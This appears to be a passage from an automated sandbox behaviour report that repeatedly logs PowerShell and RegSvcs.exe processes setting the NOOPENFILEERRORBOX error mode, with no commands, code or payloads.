Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
